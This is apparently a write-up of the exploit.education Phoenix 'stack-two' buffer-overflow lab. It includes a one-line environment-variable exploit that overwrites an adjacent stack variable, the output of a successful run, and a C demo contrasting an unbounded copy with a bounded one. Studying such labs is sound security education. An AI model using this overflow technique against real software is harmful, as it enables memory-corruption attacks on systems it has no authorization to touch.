stack-two
#### Stack Two ####
# In General:
user@home$ <environment_var_name>=$(<inline_python_var_value>) ./<binary_to_be_run>
# Exploit:
ExploitEducation=$(python -c "print 'A'*64 + '\x0a\x09\x0a\x0d'") ./stack-two
# Notes:
- We overflow buffer[64] into changeme, since buffer sits immediately before
changeme on the stack.
- ptr points to the ExploitEducation environment variable; its contents are
copied into buffer[64] via strcpy(locals.buffer, ptr), which overflows into
changeme and sets it to 0x0d0a090a, i.e. the bytes \x0a\x09\x0a\x0d read as a
little-endian integer.
user@phoenix-amd64:/opt/phoenix/i486$ ExploitEducation=$(python -c "print 'A'*64 + '\x0a\x09\x0a\x0d'") ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct val
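The layout described in the notes, shown as an added C example that is not the exploit.education source: a constructed frame with a 64-byte buffer directly followed by a 32-bit value, an unbounded strcpy-style copy that reaches the value, and the bounded copy that refuses the same input. The union with a `raw` backing array is an assumption of this demo so the stray bytes stay inside storage the program owns; the payload is built in-process rather than read from the environment.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the challenge's locals: buffer[64] immediately
   followed by changeme. The raw[] view gives the unbounded copy somewhere
   to land so this demo writes only within its own storage. */
union frame {
    struct {
        char buffer[64];
        uint32_t changeme;
    } locals;
    unsigned char raw[256];
};

/* Vulnerable pattern: copy until the NUL terminator with no length check,
   the same thing strcpy(locals.buffer, ptr) does. Returns changeme after
   the copy. buffer is at offset 0 of the union, so writing through raw[]
   is the same memory; the raw[] bound only keeps the demo in its storage. */
uint32_t copy_unbounded(const char *src) {
    union frame f;
    memset(f.raw, 0, sizeof f.raw);
    size_t i = 0;
    for (; src[i] != '\0' && i < sizeof f.raw - 1; i++) {
        f.raw[i] = (unsigned char)src[i];   /* byte 64 onward lands in changeme */
    }
    f.raw[i] = '\0';
    return f.locals.changeme;
}

/* Hardened form: check that the string and its terminator fit before
   copying. Returns 0 on success, -1 if the input would overflow; the
   caller receives changeme either way to confirm it was not touched. */
int copy_bounded(const char *src, uint32_t *changeme_out) {
    union frame f;
    memset(f.raw, 0, sizeof f.raw);
    size_t n = strlen(src);
    if (n >= sizeof f.locals.buffer) {
        *changeme_out = f.locals.changeme;
        return -1;
    }
    memcpy(f.locals.buffer, src, n + 1);
    *changeme_out = f.locals.changeme;
    return 0;
}

/* Builds the same input the writeup feeds through the environment:
   64 'A's followed by \x0a\x09\x0a\x0d (0x0d0a090a little-endian).
   Constructed here for the demo. Returns the payload length, 0 if cap
   is too small. */
size_t build_payload(char *out, size_t cap) {
    static const char tail[4] = { 0x0a, 0x09, 0x0a, 0x0d };
    if (cap < 64 + sizeof tail + 1) return 0;
    memset(out, 'A', 64);
    memcpy(out + 64, tail, sizeof tail);
    out[64 + sizeof tail] = '\0';
    return 64 + sizeof tail;
}

int main(void) {
    char payload[128];
    uint32_t c = 0;
    build_payload(payload, sizeof payload);
    printf("unbounded copy: changeme = 0x%08x\n", copy_unbounded(payload));
    int rc = copy_bounded(payload, &c);
    printf("bounded copy:   rc = %d, changeme = 0x%08x\n", rc, c);
    return 0;
}
```

On a little-endian host the unbounded copy reports changeme as 0x0d0a090a, matching the value in the notes; the bounded copy returns -1 and leaves changeme at zero, which is the check the challenge binary lacks.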